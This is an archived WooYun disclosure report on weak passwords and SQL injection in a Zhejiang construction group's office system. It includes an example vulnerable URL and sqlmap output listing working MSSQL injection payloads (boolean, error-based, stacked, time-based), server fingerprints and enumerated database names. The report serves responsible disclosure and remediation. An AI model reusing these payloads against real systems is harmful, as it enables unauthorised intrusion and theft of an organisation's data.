乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-29: 细节已通知厂商并且等待厂商处理中 2015-12-03: 厂商已经确认,细节仅向厂商公开 2015-12-13: 细节向核心白帽子及相关领域专家公开 2015-12-23: 细节向普通白帽子公开 2016-01-02: 细节向实习白帽子公开 2016-01-17: 细节向公众公开
浙江省建设投资集团办公系统漏洞打包(弱口令+SQL)
http://**.**.**.**/zjjtoa/
弱口令用户:
登录工作台,大量通知公告、人事任免、会议纪要等敏感文件
另,存在大量SQL注入点,基本所有参数都存在,请厂商自行全面排查,for example:http://**.**.**.**/zjjtoa/workasp/COA_File/COA_SendFile/OpenFile.aspx?FileID=4599
GET parameter 'FileID' is vulnerable. Do you want to keep testing the others (if any)? [y/N]sqlmap identified the following injection points with a total of 51 HTTP(s) requests:---Parameter: FileID (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: FileID=4606 AND 1307=1307 Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: FileID=4606 AND 8424=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CHAR(122)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (8424=8424) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(120)+CHAR(120)+CHAR(113))) Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: FileID=4606; WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: FileID=4606 WAITFOR DELAY '0:0:5'-- Type: inline query Title: Microsoft SQL Server/Sybase inline queries Payload: FileID=(SELECT CHAR(113)+CHAR(107)+CHAR(122)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (8121=8121) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(120)+CHAR(120)+CHAR(113))---[22:56:58] [INFO] testing Microsoft SQL Server[22:56:58] [INFO] confirming Microsoft SQL Server[22:56:59] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 1.1.4322back-end DBMS: Microsoft SQL Server 2005[22:56:59] [INFO] fetching database names[22:56:59] [INFO] the SQL query used returns 5 entries[22:56:59] [INFO] retrieved: master[22:56:59] [INFO] retrieved: model[22:56:59] [INFO] retrieved: msdb[22:56:59] [INFO] retrieved: tempdb[22:56:59] [INFO] retrieved: zjjtoaavailable databases [5]:[*] master[*] model[*] msdb[*] tempdb[*] zjjtoa
zjjtoa涉及800多个表,如下
改口令,加验证码,修复SQL注入
危害等级:中
漏洞Rank:9
确认时间:2015-12-03 17:56
CNVD确认并复现所述漏洞情况,已经转由CNCERT下发给浙江分中心,由浙江分中心后续协调网站管理单位处置。
暂无